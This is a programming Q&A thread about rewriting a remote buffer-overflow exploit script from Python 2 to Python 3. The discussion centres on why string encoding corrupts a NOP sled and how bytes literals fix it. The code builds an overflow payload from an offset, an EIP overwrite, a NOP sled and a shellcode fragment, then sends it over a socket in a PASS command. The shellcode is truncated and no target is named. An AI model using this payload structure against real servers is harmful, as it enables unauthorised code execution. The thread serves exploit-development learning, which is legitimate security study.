# Exploit development in Python 3

Tags: python, byte, buffer-overflow

I realised that exploit development with python 3 is not as straight forward as it is using python 2.

As I understand, this is mainly due to the socket library and the added `byte` datatype.

For example, I could not figure out how to translate the following code into Python 3 code:

```
--- SNIP ---
shellcode =  ""
shellcode += "\x89\xe2\xd9\xcf\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
--- SNIP ---
offset = "A" * 2606
eip = "\x43\x62\x4b\x5f"
nop = "\x90" * 16 
padding = "C"
buff = offset + eip + nop + shellcode + padding * (424 - 351 - 16)
--- SNIP ---
bytes_sent = sock.send("PASS {}\r\n".format(buff))
--- SNIP ---
```

I tried the following:

```
--- SNIP ---
shellcode =  ""
shellcode += "\x89\xe2\xd9\xcf\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
--- SNIP ---
offset = "A" * 2606
eip = "\x43\x62\x4b\x5f"
nop = "\x90" * 16 
padding = "C"
buff = offset + eip + nop + shellcode + padding * (424 - 351 - 16)
--- SNIP ---
bytes_sent = sock.send("PASS {}".format(buff).encode("UTF-8"))
--- SNIP ---
```

The problem is that `\x90` becomes `C2 90` in memory, it tooks me hours to figure out that the issue came from my code. I also suspect that this could alter the shellcode as well.

I would like to learn the proper way of doing this in Python

Comment: That said, note there is a 2to3 tool bundled with python3 which will automatically do most of the work to convert python 2 to python 3 code. Might help here, too.

Comment: @SteffenUllrich I was not sure where to post that question, I thought that security.stackexchange.com was the right place but you have got a point it is more a programming issue. I am going to close that question and open it in stackoverflow then.

Comment: I am transferring this question to stackoverflow.

Comment: pwntools for the win: `from pwn import *`

Answer (score 4, accepted):

The Python 2 code essentially builds up a byte string. In Python 3, `'...'` string literals build up a Unicode string object instead.

In Python 3, you want `bytes` objects instead, which you can creating by using `b'...'` byte string literals:

```
# --- SNIP ---
shellcode =  b""
shellcode += b"\x89\xe2\xd9\xcf\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
# --- SNIP ---
offset = b"A" * 2606
eip = b"\x43\x62\x4b\x5f"
nop = b"\x90" * 16 
padding = b"C"
buff = offset + eip + nop + shellcode + padding * (424 - 351 - 16)
# --- SNIP ---
bytes_sent = sock.send(b"PASS %s\r\n" % buff)
# --- SNIP ---
```

`bytes` doesn't have a `.format()` method, but the `%` formatting operation is still available.

Comment: Thanks for this reply; would you by chance know a way to directly convert a string variable to a byte variable? The `.encode()` method causes my `\x90` nopsled to be sent as `C2 90`.

Comment: @AresS31: In a text string, `\xhh` escapes produce *Latin-1* codepoints (anything in the Unicode U+0000-U+00FF range), not bytes. You'd have to encode using Latin-1, the characters map one-on-one to bytes in that codec. However, you are not producing 'text' here, but binary data. Stick to using `bytes`.

Comment: Was that a server-side exploit? or a local buffer overflow exploit occurring when you ran this python program? just looking for sample buffer overflow code written in python for demonstration purposes.

Answer (score 0):

As told by Martijn Pieters♦, a good start to get the same signature in the output of python print like function as in the code injected in a program you have tu start to use `b"your shellcode"`.

Example:

```
b"AAAA"
```

or

```
b"\x90\x90\x90\x90"
```

Now, to print to the output of another program, you shall not use print(). You shall use `sys.stdout.buffer.write(value)`.

Example:

```
shellcode = b"\x41\x42\x43\x44"
sys.stdout.buffer.write(shellcode)
```

Sources:

1. [Live Overflow video on youtube](https://www.youtube.com/watch?v=FxNS-zSS7MQ)